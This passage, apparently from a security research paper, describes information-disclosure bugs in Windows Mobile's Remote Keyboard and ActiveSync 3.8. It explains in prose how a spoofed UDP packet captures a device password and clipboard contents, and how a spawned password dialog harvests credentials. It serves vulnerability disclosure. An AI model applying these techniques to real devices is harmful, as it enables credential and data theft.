Miscellaneous Information Disclosure Bugs
Not all Windows Mobile related security problems are related to failed protection schemes. This section will outline several other program and bugs that were found during the research project.
From the vendors website, "Remote Keyboard is a program that connects PC keyboard and mouse to your Pocket PC over ActiveSync connection or TCP/IP network." This is a handy program for power users who need to enter a lot of text into the PDA.
Once installed, the client on the PC sends out UDP packets containing an IP address to port 23 that are detected by a listener on the PDA. Upon detection, the PDA will connect back to port 8123 on the specified IP address. At this point the PC will query for the correct password, which is provided by the PDA application. Finally, the connection is made and the user can control the PDA remotely from the PC client.
We discovered a few problems with this program that can expose the password used to authenticate the connection as well as capture the clipboard contents of the PC. The first issue was discovered when we created a custom UDP packet that contained our "server's" IP address and passed it onto the network. The Remote Keyboard listener on the PDA detected this packet, and immediately tried to connect to our computer on port 8123. Upon seeing this, we then created a small and simple "server" that emulated the login process. As guessed, once the PDA had connected to the "server" and negotiated the connection, it sent the "server" the authentication password.
Using this captured password, we then telneted to the PC service running on port 8123 and discovered that the program dumped the entire contents of the clipboard onto the wire after a successful login. The following provides a screenshot of this bug.
Figure 4: Remote Keyboard capture
ActiveSync is "the" program used to sync a Windows Mobile device to a PC. It is the most-downloaded Windows Mobile software application of all time. Contained in this program are functions used to upload software, sync up emails, and much more. Version 4.0 and above have restricted any form of network-based synchronization; however, as many users rely on this feature for their day-to-day synchronization needs, Microsoft still provides AS 3.8 as a download.
As we discovered in mid-2005, the AS 3.8 service on the PC opens up port 990 on any existing interface (i.e. wired, wireless, PPP, etc.). This port allows access to the ActiveSync service, which can be abused to spawn a password box on the PC users screen (Figure 5). If a user enters a value in this dialog box, the characters of the password are returned to the attacker, who can then use this data to gain access to the protected PDA or create a connection between an attacker's PDA and the target PC.
Figure 5: Spoofed spawned password dialog box